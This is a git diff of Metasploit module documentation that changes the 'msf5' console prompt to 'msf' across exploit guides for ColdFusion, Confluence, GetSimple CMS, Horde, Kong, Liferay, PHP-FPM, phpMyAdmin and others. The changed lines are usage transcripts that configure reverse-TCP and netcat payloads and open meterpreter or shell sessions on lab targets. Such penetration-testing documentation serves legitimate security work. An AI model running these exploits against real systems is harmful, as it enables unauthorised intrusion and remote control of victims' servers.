run +msf exploit(multi/http/cmsms_upload_rename_rce) > run [*] Started reverse TCP handler on 172.22.222.194:4444 [*] Sending stage (37775 bytes) to 172.22.222.175 
diff --git a/documentation/modules/exploit/multi/http/coldfusion_ckeditor_file_upload.md b/documentation/modules/exploit/multi/http/coldfusion_ckeditor_file_upload.md index e84b7d0ca2..ad27087473 100644 --- a/documentation/modules/exploit/multi/http/coldfusion_ckeditor_file_upload.md +++ b/documentation/modules/exploit/multi/http/coldfusion_ckeditor_file_upload.md @@ -26,12 +26,12 @@ ColdFusion 2016 (Update 6 and earlier), and ### Tested on Coldfusion 2018 v2018.0.0.310739 ``` -msf5 > use exploit/multi/http/coldfusion_ckeditor_file_upload -msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set rhosts 172.22.222.142 +msf > use exploit/multi/http/coldfusion_ckeditor_file_upload +msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set rhosts 172.22.222.142 rhosts => 172.22.222.142 -msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set lhost 172.22.222.136 +msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set lhost 172.22.222.136 lhost => 172.22.222.136 -msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > exploit +msf exploit(multi/http/coldfusion_ckeditor_file_upload) > exploit [*] Started reverse TCP handler on 172.22.222.136:4444 [*] Uploading the JSP payload at /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/ASMK.jsp... @@ -44,5 +44,5 @@ uname -a Linux 6bd4238e7ffb 4.15.0-38-generic #41-Ubuntu SMP Wed Oct 10 10:59:38 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux exit [*] 172.22.222.142 - Command shell session 1 closed. -msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > +msf exploit(multi/http/coldfusion_ckeditor_file_upload) > ``` diff --git a/documentation/modules/exploit/multi/http/confluence_widget_connector.md b/documentation/modules/exploit/multi/http/confluence_widget_connector.md index 775161ddab..8beb7a422b 100644 --- a/documentation/modules/exploit/multi/http/confluence_widget_connector.md +++ b/documentation/modules/exploit/multi/http/confluence_widget_connector.md 
@@ -33,27 +33,27 @@ Affecting Atlassian Confluence before version 6.6.12, from version 6.7.0 before ## Scenarios ## Tested on Confluence 6.8.2 with Windows target ``` -msf5 > use exploit/multi/http/confluence_widget_connector -msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com +msf > use exploit/multi/http/confluence_widget_connector +msf exploit(multi/http/confluence_widget_connector) > set RHOST target.com RHOST => target.com -msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090 +msf exploit(multi/http/confluence_widget_connector) > set RPORT 8090 RPORT => 8090 -msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1 +msf exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1 SRVHOST => 192.168.0.1 -msf5 exploit(multi/http/confluence_widget_connector) > set TARGET Windows +msf exploit(multi/http/confluence_widget_connector) > set TARGET Windows TARGET => Windows -msf5 exploit(multi/http/confluence_widget_connector) > check +msf exploit(multi/http/confluence_widget_connector) > check [*] target.com:8090 - Starting the FTP server. [*] target.com:8090 - Started service listener on 192.168.0.1:8021 [+] target.com:8090 - The target is vulnerable. [*] target.com:8090 - Server stopped. -msf5 exploit(multi/http/confluence_widget_connector) > exploit +msf exploit(multi/http/confluence_widget_connector) > exploit [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 192.168.0.1:4444 [*] target.com:8090 - Starting the FTP server. 
[*] target.com:8090 - Started service listener on 192.168.0.1:8021 -msf5 exploit(multi/http/confluence_widget_connector) > +msf exploit(multi/http/confluence_widget_connector) > [*] target.com:8090 - Target being detected as: Windows 10 [*] target.com:8090 - Attempting to upload C:\PROGRA~1\Atlassian\Confluence\temp\gAdGh.exe [*] target.com:8090 - Attempting to copy payload to C:\PROGRA~1\Atlassian\Confluence\temp\MRuDb.exe @@ -64,7 +64,7 @@ msf5 exploit(multi/http/confluence_widget_connector) > [!] This exploit may require manual cleanup of 'C:\PROGRA~1\Atlassian\Confluence\temp\FFDBo.exe' on the target [!] This exploit may require manual cleanup of 'C:\PROGRA~1\Atlassian\Confluence\temp\JLzIZ.exe' on the target [*] target.com:8090 - Server stopped. -msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1 +msf exploit(multi/http/confluence_widget_connector) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid 
@@ -73,30 +73,30 @@ meterpreter > quit [*] Shutting down Meterpreter... [*] target.com - Meterpreter session 1 closed. Reason: User exit -msf5 exploit(multi/http/confluence_widget_connector) > +msf exploit(multi/http/confluence_widget_connector) > ``` ## Tested on Confluence 6.8.2 with Java target ``` -msf5 > use exploit/multi/http/confluence_widget_connector -msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com +msf > use exploit/multi/http/confluence_widget_connector +msf exploit(multi/http/confluence_widget_connector) > set RHOST target.com RHOST => target.com -msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090 +msf exploit(multi/http/confluence_widget_connector) > set RPORT 8090 RPORT => 8090 -msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1 +msf exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1 SRVHOST => 192.168.0.1 -msf5 exploit(multi/http/confluence_widget_connector) > check +msf exploit(multi/http/confluence_widget_connector) > check [*] target.com:8090 - Starting the FTP server. [*] target.com:8090 - Started service listener on 192.168.0.1:8021 [+] target.com:8090 - The target is vulnerable. [*] target.com:8090 - Server stopped. -msf5 exploit(multi/http/confluence_widget_connector) > exploit +msf exploit(multi/http/confluence_widget_connector) > exploit [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 192.168.0.1:4444 [*] target.com:8090 - Starting the FTP server. [*] target.com:8090 - Started service listener on 192.168.0.1:8021 -msf5 exploit(multi/http/confluence_widget_connector) > +msf exploit(multi/http/confluence_widget_connector) > [*] target.com:8090 - Target being detected as: Linux [*] target.com:8090 - Attempting to upload /opt/atlassian/confluence/temp/EjpPf.jar [*] target.com:8090 - Attempting to execute /opt/atlassian/confluence/temp/EjpPf.jar 
@@ -105,7 +105,7 @@ msf5 exploit(multi/http/confluence_widget_connector) > [+] target.com:8090 -Deleted /opt/atlassian/confluence/temp/EjpPf.jar [*] target.com:8090 - Waiting for exploit to complete... [*] target.com:8090 - Server stopped. -msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1 +msf exploit(multi/http/confluence_widget_connector) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid 
@@ -114,30 +114,30 @@ meterpreter > quit [*] Shutting down Meterpreter... [*] target.com - Meterpreter session 1 closed. Reason: User exit -msf5 exploit(multi/http/confluence_widget_connector) > +msf exploit(multi/http/confluence_widget_connector) > ``` ## Tested on Confluence 6.8.2 with Linux target ``` -msf5 > use exploit/multi/http/confluence_widget_connector -msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com +msf > use exploit/multi/http/confluence_widget_connector +msf exploit(multi/http/confluence_widget_connector) > set RHOST target.com RHOST => target.com -msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090 +msf exploit(multi/http/confluence_widget_connector) > set RPORT 8090 RPORT => 8090 -msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1 +msf exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1 SRVHOST => 192.168.0.1 -msf5 exploit(multi/http/confluence_widget_connector) > check +msf exploit(multi/http/confluence_widget_connector) > check [*] target.com:8090 - Starting the FTP server. [*] target.com:8090 - Started service listener on 192.168.0.1:8021 [+] target.com:8090 - The target is vulnerable. [*] target.com:8090 - Server stopped. -msf5 exploit(multi/http/confluence_widget_connector) > exploit +msf exploit(multi/http/confluence_widget_connector) > exploit [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 192.168.0.1:4444 [*] target.com:8090 - Starting the FTP server. [*] target.com:8090 - Started service listener on 192.168.0.1:8021 -msf5 exploit(multi/http/confluence_widget_connector) > +msf exploit(multi/http/confluence_widget_connector) > [*] target.com:8090 - Target being detected as: Linux [*] target.com:8090 - Attempting to upload /opt/atlassian/confluence/temp/BYHzD [*] target.com:8090 - Attempting to copy payload to /opt/atlassian/confluence/temp/dESMnt 
@@ -148,7 +148,7 @@ msf5 exploit(multi/http/confluence_widget_connector) > [+] target.com:8090 - Deleted /opt/atlassian/confluence/temp/dESMnt [*] target.com:8090 - Waiting for exploit to complete... [*] target.com:8090 - Server stopped. -msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1 +msf exploit(multi/http/confluence_widget_connector) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid @@ -157,5 +157,5 @@ meterpreter > quit [*] Shutting down Meterpreter... [*] target.com - Meterpreter session 1 closed. Reason: User exit -msf5 exploit(multi/http/confluence_widget_connector) > +msf exploit(multi/http/confluence_widget_connector) > ``` diff --git a/documentation/modules/exploit/multi/http/getsimplecms_unauth_code_exec.md b/documentation/modules/exploit/multi/http/getsimplecms_unauth_code_exec.md index 90d7877742..edfcc07a76 100644 --- a/documentation/modules/exploit/multi/http/getsimplecms_unauth_code_exec.md +++ b/documentation/modules/exploit/multi/http/getsimplecms_unauth_code_exec.md @@ -26,12 +26,12 @@ ### Tested on GetSimple CMS v3.3.15 on Ubuntu 18.04 ``` - msf5 > use exploit/multi/http/getsimplecms_unauth_code_exec - msf5 exploit(multi/http/getsimplecms_unauth_code_exec) > set rhosts 192.168.37.137 + msf > use exploit/multi/http/getsimplecms_unauth_code_exec + msf exploit(multi/http/getsimplecms_unauth_code_exec) > set rhosts 192.168.37.137 rhosts => 192.168.37.137 - msf5 exploit(multi/http/getsimplecms_unauth_code_exec) > set verbose true + msf exploit(multi/http/getsimplecms_unauth_code_exec) > set verbose true verbose => true - msf5 exploit(multi/http/getsimplecms_unauth_code_exec) > run + msf exploit(multi/http/getsimplecms_unauth_code_exec) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] GetSimpleCMS version 3315 diff --git a/documentation/modules/exploit/multi/http/git_submodule_url_exec.md b/documentation/modules/exploit/multi/http/git_submodule_url_exec.md index 79d2e8a7e6..76443c529c 100644 
--- a/documentation/modules/exploit/multi/http/git_submodule_url_exec.md +++ b/documentation/modules/exploit/multi/http/git_submodule_url_exec.md @@ -48,15 +48,15 @@ ``` -msf5 > use exploit/multi/http/git_submodule_url_exec -msf5 exploit(multi/http/git_submodule_url_exec) > set LHOST 192.168.0.1 +msf > use exploit/multi/http/git_submodule_url_exec +msf exploit(multi/http/git_submodule_url_exec) > set LHOST 192.168.0.1 LHOST => 192.168.0.1 -msf5 exploit(multi/http/git_submodule_url_exec) > exploit +msf exploit(multi/http/git_submodule_url_exec) > exploit [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 192.168.0.1:4444 -msf5 exploit(multi/http/git_submodule_url_exec) > [*] Using URL: http://0.0.0.0:8080/yaDlXuHVnRMMYGQ +msf exploit(multi/http/git_submodule_url_exec) > [*] Using URL: http://0.0.0.0:8080/yaDlXuHVnRMMYGQ [*] Local IP: http://192.168.0.1:8080/yaDlXuHVnRMMYGQ [*] Server started. [*] Malicious Git URI is http://192.168.0.1:8080/ogkvs.git diff --git a/documentation/modules/exploit/multi/http/gitlist_arg_injection.md b/documentation/modules/exploit/multi/http/gitlist_arg_injection.md index 356c18489d..f1e2415ee8 100644 --- a/documentation/modules/exploit/multi/http/gitlist_arg_injection.md +++ b/documentation/modules/exploit/multi/http/gitlist_arg_injection.md 
@@ -20,12 +20,12 @@ ### Tested on Ubuntu 18.04 x64 ``` - msf5 > use exploit/multi/http/gitlist_arg_injection - msf5 exploit(multi/http/gitlist_arg_injection) > set rhosts 192.168.37.141 + msf > use exploit/multi/http/gitlist_arg_injection + msf exploit(multi/http/gitlist_arg_injection) > set rhosts 192.168.37.141 rhosts => 192.168.37.141 - msf5 exploit(multi/http/gitlist_arg_injection) > check + msf exploit(multi/http/gitlist_arg_injection) > check [+] 192.168.37.141:80 The target is vulnerable. - msf5 exploit(multi/http/gitlist_arg_injection) > run + msf exploit(multi/http/gitlist_arg_injection) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Sending stage (37775 bytes) to 192.168.37.141 diff --git a/documentation/modules/exploit/multi/http/horde_csv_rce.md b/documentation/modules/exploit/multi/http/horde_csv_rce.md index b5bc32cbc7..b5d77d55c1 100644 --- a/documentation/modules/exploit/multi/http/horde_csv_rce.md +++ b/documentation/modules/exploit/multi/http/horde_csv_rce.md 
@@ -29,18 +29,18 @@ pear install --ignore-errors horde/horde_data-2.1.4 ### Horde Groupware Webmail Edition 5.2.22 with Horde Data API 2.1.4 on Debian GNU/Linux 9 ``` -msf5 > use exploit/multi/http/horde_csv_rce -msf5 exploit(multi/http/horde_csv_rce) > set payload php/meterpreter/reverse_tcp +msf > use exploit/multi/http/horde_csv_rce +msf exploit(multi/http/horde_csv_rce) > set payload php/meterpreter/reverse_tcp payload => php/meterpreter/reverse_tcp -msf5 exploit(multi/http/horde_csv_rce) > set lhost 192.168.1.69 +msf exploit(multi/http/horde_csv_rce) > set lhost 192.168.1.69 lhost => 192.168.1.69 -msf5 exploit(multi/http/horde_csv_rce) > set rhost 192.168.1.69 +msf exploit(multi/http/horde_csv_rce) > set rhost 192.168.1.69 rhost => 192.168.1.69 -msf5 exploit(multi/http/horde_csv_rce) > set username alice +msf exploit(multi/http/horde_csv_rce) > set username alice username => alice -msf5 exploit(multi/http/horde_csv_rce) > set password alice +msf exploit(multi/http/horde_csv_rce) > set password alice password => alice -msf5 exploit(multi/http/horde_csv_rce) > exploit +msf exploit(multi/http/horde_csv_rce) > exploit [*] Started reverse TCP handler on 0.0.0.0:4444 [*] Sending stage (38288 bytes) to 172.17.0.1 diff --git a/documentation/modules/exploit/multi/http/jenkins_metaprogramming.md b/documentation/modules/exploit/multi/http/jenkins_metaprogramming.md index 7bfe033649..3f02d636a3 100644 --- a/documentation/modules/exploit/multi/http/jenkins_metaprogramming.md +++ b/documentation/modules/exploit/multi/http/jenkins_metaprogramming.md @@ -57,7 +57,7 @@ Set this to `true` to override the `check` result during exploitation. ## Usage ``` -msf5 exploit(multi/http/jenkins_metaprogramming) > run +msf exploit(multi/http/jenkins_metaprogramming) > run [*] Started HTTPS reverse handler on https://192.168.1.2:8443 [*] Jenkins 2.137 detected 
diff --git a/documentation/modules/exploit/multi/http/kong_gateway_admin_api_rce.md b/documentation/modules/exploit/multi/http/kong_gateway_admin_api_rce.md index 2792d39378..cf99bf6409 100644 --- a/documentation/modules/exploit/multi/http/kong_gateway_admin_api_rce.md +++ b/documentation/modules/exploit/multi/http/kong_gateway_admin_api_rce.md @@ -75,18 +75,18 @@ In this scenario, the admin API is not bound to localhost and is therefore avail ``` $ msfconsole -q [*] Starting persistent handler(s)... -msf5 > use exploit/multi/http/kong_gateway_admin_api_rce +msf > use exploit/multi/http/kong_gateway_admin_api_rce [*] No payload configured, defaulting to cmd/unix/reverse_netcat -msf5 exploit(multi/http/kong_gateway_admin_api_rce) > set lhost 192.168.194.131 +msf exploit(multi/http/kong_gateway_admin_api_rce) > set lhost 192.168.194.131 lhost => 192.168.194.131 -msf5 exploit(multi/http/kong_gateway_admin_api_rce) > set rhosts 192.168.194.130 +msf exploit(multi/http/kong_gateway_admin_api_rce) > set rhosts 192.168.194.130 rhosts => 192.168.194.130 -msf5 exploit(multi/http/kong_gateway_admin_api_rce) > run -z +msf exploit(multi/http/kong_gateway_admin_api_rce) > run -z [*] Started reverse TCP handler on 192.168.194.131:4444 [*] Command shell session 1 opened (192.168.194.131:4444 -> 192.168.194.130:41939) at 2020-10-13 16:24:13 +0100 [*] Session 1 created in the background. -msf5 exploit(multi/http/kong_gateway_admin_api_rce) > sessions +msf exploit(multi/http/kong_gateway_admin_api_rce) > sessions Active sessions =============== 
@@ -102,18 +102,18 @@ In this scenario, the admin API is bound to localhost and has been forwarded usi ``` $ msfconsole -q -msf5 > use exploit/multi/http/kong_gateway_admin_api_rce +msf > use exploit/multi/http/kong_gateway_admin_api_rce [*] No payload configured, defaulting to cmd/unix/reverse_netcat -msf5 exploit(multi/http/kong_gateway_admin_api_rce) > set rhost 127.0.0.1 +msf exploit(multi/http/kong_gateway_admin_api_rce) > set rhost 127.0.0.1 rhost => 127.0.0.1 -msf5 exploit(multi/http/kong_gateway_admin_api_rce) > set public-api-rhost 192.168.194.130 +msf exploit(multi/http/kong_gateway_admin_api_rce) > set public-api-rhost 192.168.194.130 public-api-rhost => 192.168.194.130 -msf5 exploit(multi/http/kong_gateway_admin_api_rce) > run -z +msf exploit(multi/http/kong_gateway_admin_api_rce) > run -z [*] Started reverse TCP handler on 192.168.194.131:4444 [*] Command shell session 1 opened (192.168.194.131:4444 -> 192.168.194.130:44705) at 2020-10-27 20:57:02 +0000 [*] Session 1 created in the background. -msf5 exploit(multi/http/kong_gateway_admin_api_rce) > sessions +msf exploit(multi/http/kong_gateway_admin_api_rce) > sessions Active sessions =============== diff --git a/documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md b/documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md index bb50cb5760..b85b9b0d23 100644 --- a/documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md +++ b/documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md @@ -44,8 +44,8 @@ with the remote classloading server. ### Liferay Portal 7.2.0 GA1 from [Docker Hub](https://hub.docker.com/r/liferay/portal) ``` -msf5 > use exploit/multi/http/liferay_java_unmarshalling -msf5 exploit(multi/http/liferay_java_unmarshalling) > options +msf > use exploit/multi/http/liferay_java_unmarshalling +msf exploit(multi/http/liferay_java_unmarshalling) > options Module options (exploit/multi/http/liferay_java_unmarshalling): 
@@ -77,13 +77,13 @@ Exploit target: 0 Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2 -msf5 exploit(multi/http/liferay_java_unmarshalling) > set rhosts 127.0.0.1 +msf exploit(multi/http/liferay_java_unmarshalling) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 exploit(multi/http/liferay_java_unmarshalling) > set lhost 192.168.1.3 +msf exploit(multi/http/liferay_java_unmarshalling) > set lhost 192.168.1.3 lhost => 192.168.1.3 -msf5 exploit(multi/http/liferay_java_unmarshalling) > set srvport 8888 +msf exploit(multi/http/liferay_java_unmarshalling) > set srvport 8888 srvport => 8888 -msf5 exploit(multi/http/liferay_java_unmarshalling) > run +msf exploit(multi/http/liferay_java_unmarshalling) > run [*] Started reverse TCP handler on 192.168.1.3:4444 [*] Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/multi/http/maracms_upload_exec.md b/documentation/modules/exploit/multi/http/maracms_upload_exec.md index 98a2d60ee1..d71488e2c9 100644 --- a/documentation/modules/exploit/multi/http/maracms_upload_exec.md +++ b/documentation/modules/exploit/multi/http/maracms_upload_exec.md @@ -58,7 +58,7 @@ Id Name ## Scenarios ### MaraCMS 7.5 running on Windows Server 2012 (XAMPP server) - PHP target ``` -msf5 exploit(multi/http/maracms_upload_exec) > show options +msf exploit(multi/http/maracms_upload_exec) > show options Module options (exploit/multi/http/maracms_upload_exec): @@ -93,7 +93,7 @@ Exploit target: 0 PHP -msf5 exploit(multi/http/maracms_upload_exec) > run +msf exploit(multi/http/maracms_upload_exec) > run [*] Started reverse TCP handler on 192.168.1.12 :4444 [*] Executing automatic check (disable AutoCheck to override) 
@@ -115,7 +115,7 @@ meterpreter > ``` ### MaraCMS 7.5 running on Windows Server 2012 (XAMPP server) - Windows target ``` -msf5 exploit(multi/http/maracms_upload_exec) > run +msf exploit(multi/http/maracms_upload_exec) > run [*] Started reverse TCP handler on 1192.168.1.12:4444 [*] Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/multi/http/navigate_cms_rce.md b/documentation/modules/exploit/multi/http/navigate_cms_rce.md index 9b47e11b5e..89984bd39d 100644 --- a/documentation/modules/exploit/multi/http/navigate_cms_rce.md +++ b/documentation/modules/exploit/multi/http/navigate_cms_rce.md @@ -26,12 +26,12 @@ This module was tested against Navigate CMS 2.8. ### Navigate CMS on Ubuntu 18.04 ``` -msf5 > use exploit/multi/http/navigate_cms_rce -msf5 exploit(multi/http/navigate_cms_rce) > set RHOST 192.168.178.45 +msf > use exploit/multi/http/navigate_cms_rce +msf exploit(multi/http/navigate_cms_rce) > set RHOST 192.168.178.45 RHOST => 192.168.178.45 -msf5 exploit(multi/http/navigate_cms_rce) > check +msf exploit(multi/http/navigate_cms_rce) > check [*] 192.168.178.45:80 The target appears to be vulnerable. -msf5 exploit(multi/http/navigate_cms_rce) > exploit +msf exploit(multi/http/navigate_cms_rce) > exploit [*] Started reverse TCP handler on 192.168.178.35:4444 [+] Login bypass successful diff --git a/documentation/modules/exploit/multi/http/nostromo_code_exec.md b/documentation/modules/exploit/multi/http/nostromo_code_exec.md index cb56bfc570..eafa327838 100644 --- a/documentation/modules/exploit/multi/http/nostromo_code_exec.md +++ b/documentation/modules/exploit/multi/http/nostromo_code_exec.md 
@@ -24,22 +24,22 @@ Nostromo sources can be downloaded from http://www.nazgul.ch/dev_nostromo.html Example utilizing nostromo 1.9.6 on Ubuntu Linux. ``` -msf5 > use exploit/multi/http/nostromo_code_exec -msf5 exploit(multi/http/nostromo_code_exec) > set RHOSTS 192.168.1.9 +msf > use exploit/multi/http/nostromo_code_exec +msf exploit(multi/http/nostromo_code_exec) > set RHOSTS 192.168.1.9 RHOSTS => 192.168.1.9 -msf5 exploit(multi/http/nostromo_code_exec) > set RPORT 8000 +msf exploit(multi/http/nostromo_code_exec) > set RPORT 8000 RPORT => 8000 -msf5 exploit(multi/http/nostromo_code_exec) > check +msf exploit(multi/http/nostromo_code_exec) > check [*] 192.168.1.9:8000 - The target appears to be vulnerable. -msf5 exploit(multi/http/nostromo_code_exec) > set target 1 +msf exploit(multi/http/nostromo_code_exec) > set target 1 target => 1 -msf5 exploit(multi/http/nostromo_code_exec) > set payload linux/x86/meterpreter/reverse_tcp +msf exploit(multi/http/nostromo_code_exec) > set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcp -msf5 exploit(multi/http/nostromo_code_exec) > set LHOST 192.168.1.10 +msf exploit(multi/http/nostromo_code_exec) > set LHOST 192.168.1.10 LHOST => 192.168.1.10 -msf5 exploit(multi/http/nostromo_code_exec) > set LPORT 4444 +msf exploit(multi/http/nostromo_code_exec) > set LPORT 4444 LPORT => 4444 -msf5 exploit(multi/http/nostromo_code_exec) > run +msf exploit(multi/http/nostromo_code_exec) > run [*] Started reverse TCP handler on 192.168.1.10:4444 [*] Configuring Automatic (Linux Dropper) target 
@@ -62,22 +62,22 @@ meterpreter > exit nostromo 1.9.6 on OpenBSD. ``` -msf5 > use exploit/multi/http/nostromo_code_exec -msf5 exploit(multi/http/nostromo_code_exec) > set RHOSTS 192.168.1.9 +msf > use exploit/multi/http/nostromo_code_exec +msf exploit(multi/http/nostromo_code_exec) > set RHOSTS 192.168.1.9 RHOSTS => 192.168.1.9 -msf5 exploit(multi/http/nostromo_code_exec) > set RPORT 8001 +msf exploit(multi/http/nostromo_code_exec) > set RPORT 8001 RPORT => 8001 -msf5 exploit(multi/http/nostromo_code_exec) > check +msf exploit(multi/http/nostromo_code_exec) > check [*] 192.168.1.9:8001 - The target appears to be vulnerable. -msf5 exploit(multi/http/nostromo_code_exec) > set target 0 +msf exploit(multi/http/nostromo_code_exec) > set target 0 target => 0 -msf5 exploit(multi/http/nostromo_code_exec) > set payload cmd/unix/reverse_perl +msf exploit(multi/http/nostromo_code_exec) > set payload cmd/unix/reverse_perl payload => cmd/unix/reverse_perl -msf5 exploit(multi/http/nostromo_code_exec) > set LHOST 192.168.1.10 +msf exploit(multi/http/nostromo_code_exec) > set LHOST 192.168.1.10 LHOST => 192.168.1.10 -msf5 exploit(multi/http/nostromo_code_exec) > set LPORT 4444 +msf exploit(multi/http/nostromo_code_exec) > set LPORT 4444 LPORT => 4444 -msf5 exploit(multi/http/nostromo_code_exec) > run +msf exploit(multi/http/nostromo_code_exec) > run [*] Started reverse TCP handler on 192.168.1.10:4444 [*] Configuring Automatic (Unix In-Memory) target diff --git a/documentation/modules/exploit/multi/http/october_upload_bypass_exec.md b/documentation/modules/exploit/multi/http/october_upload_bypass_exec.md index cca0bc0ae0..42dc7e27d2 100644 --- a/documentation/modules/exploit/multi/http/october_upload_bypass_exec.md +++ b/documentation/modules/exploit/multi/http/october_upload_bypass_exec.md 
@@ -24,14 +24,14 @@ ## Verification Steps ``` - msf5 > use exploit/multi/http/october_upload_bypass_exec - msf5 exploit(multi/http/october_upload_bypass_exec) > set rhosts 10.10.10.16 + msf > use exploit/multi/http/october_upload_bypass_exec + msf exploit(multi/http/october_upload_bypass_exec) > set rhosts 10.10.10.16 rhosts => 10.10.10.16 - msf5 exploit(multi/http/october_upload_bypass_exec) > setg verbose true + msf exploit(multi/http/october_upload_bypass_exec) > setg verbose true verbose => true - msf5 exploit(multi/http/october_upload_bypass_exec) > set lhost 10.10.14.8 + msf exploit(multi/http/october_upload_bypass_exec) > set lhost 10.10.14.8 lhost => 10.10.14.8 - msf5 exploit(multi/http/october_upload_bypass_exec) > run + msf exploit(multi/http/october_upload_bypass_exec) > run [*] Started reverse TCP handler on 10.10.14.8:4444 [+] Token for login : 3ySsc8d8VNMm2V8x3Ns4cay05bwhRxnoIkQjRnBP diff --git a/documentation/modules/exploit/multi/http/openmrs_deserialization.md b/documentation/modules/exploit/multi/http/openmrs_deserialization.md index 418a03c429..c7321e472d 100644 --- a/documentation/modules/exploit/multi/http/openmrs_deserialization.md +++ b/documentation/modules/exploit/multi/http/openmrs_deserialization.md 
@@ -29,14 +29,14 @@ ### OpenMRS Platform `v2.1.2` ``` - msf5 > use exploit/multi/http/openmrs_deserialization - msf5 exploit(multi/http/openmrs_deserialization) > set rhosts 192.168.37.176 + msf > use exploit/multi/http/openmrs_deserialization + msf exploit(multi/http/openmrs_deserialization) > set rhosts 192.168.37.176 rhosts => 192.168.37.176 - msf5 exploit(multi/http/openmrs_deserialization) > set targeturi /openmrs-standalone + msf exploit(multi/http/openmrs_deserialization) > set targeturi /openmrs-standalone targeturi => /openmrs-standalone - msf5 exploit(multi/http/openmrs_deserialization) > check + msf exploit(multi/http/openmrs_deserialization) > check [*] 192.168.37.176:8081 - The target appears to be vulnerable. OpenMRS platform version: 2.1.2 - msf5 exploit(multi/http/openmrs_deserialization) > run + msf exploit(multi/http/openmrs_deserialization) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Target is running OpenMRS diff --git a/documentation/modules/exploit/multi/http/php_fpm_rce.md b/documentation/modules/exploit/multi/http/php_fpm_rce.md index c6abe55070..8337bb159b 100644 --- a/documentation/modules/exploit/multi/http/php_fpm_rce.md +++ b/documentation/modules/exploit/multi/http/php_fpm_rce.md 
@@ -128,18 +128,18 @@ configuration provided by the author ### Ubuntu 18.04 + nginx 1.14.0 + PHP 7.1.33dev (fpm-fcgi) (built: Feb 14 2020 16:48:15) ``` -msf5 > use exploit/multi/http/php_fpm_rce -msf5 exploit(multi/http/php_fpm_rce) > set RHOSTS 192.168.6.6 +msf > use exploit/multi/http/php_fpm_rce +msf exploit(multi/http/php_fpm_rce) > set RHOSTS 192.168.6.6 RHOSTS => 192.168.6.6 -msf5 exploit(multi/http/php_fpm_rce) > set RPORT 8080 +msf exploit(multi/http/php_fpm_rce) > set RPORT 8080 RPORT => 8080 -msf5 exploit(multi/http/php_fpm_rce) > set TARGETURI /script.php +msf exploit(multi/http/php_fpm_rce) > set TARGETURI /script.php TARGETURI => /script.php -msf5 exploit(multi/http/php_fpm_rce) > set PAYLOAD php/meterpreter/reverse_tcp +msf exploit(multi/http/php_fpm_rce) > set PAYLOAD php/meterpreter/reverse_tcp PAYLOAD => php/meterpreter/reverse_tcp -msf5 exploit(multi/http/php_fpm_rce) > set LHOST 192.168.6.6 +msf exploit(multi/http/php_fpm_rce) > set LHOST 192.168.6.6 LHOST => 192.168.6.6 -msf5 exploit(multi/http/php_fpm_rce) > run +msf exploit(multi/http/php_fpm_rce) > run [*] Started reverse TCP handler on 192.168.6.6:4444 [*] Sending baseline query... diff --git a/documentation/modules/exploit/multi/http/phpmyadmin_lfi_rce.md b/documentation/modules/exploit/multi/http/phpmyadmin_lfi_rce.md index 0ebc4d0083..09b7bfe1db 100644 --- a/documentation/modules/exploit/multi/http/phpmyadmin_lfi_rce.md +++ b/documentation/modules/exploit/multi/http/phpmyadmin_lfi_rce.md 
@@ -18,10 +18,10 @@ phpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion, which can b ### Tested on Windows 7 x64 using PHP 7.2.4 and phpMyAdmin 4.8.1 ``` -msf5 > use exploit/multi/http/phpmyadmin_lfi_rce -msf5 exploit(multi/http/phpmyadmin_lfi_rce) > set rhosts 172.22.222.122 +msf > use exploit/multi/http/phpmyadmin_lfi_rce +msf exploit(multi/http/phpmyadmin_lfi_rce) > set rhosts 172.22.222.122 rhosts => 172.22.222.122 -msf5 exploit(multi/http/phpmyadmin_lfi_rce) > run +msf exploit(multi/http/phpmyadmin_lfi_rce) > run [*] Started reverse TCP handler on 172.22.222.190:4444 [*] Sending stage (37775 bytes) to 172.22.222.122 diff --git a/documentation/modules/exploit/multi/http/phpmyadmin_null_termination_exec.md b/documentation/modules/exploit/multi/http/phpmyadmin_null_termination_exec.md index e5a824af03..249bc9fcab 100644 --- a/documentation/modules/exploit/multi/http/phpmyadmin_null_termination_exec.md +++ 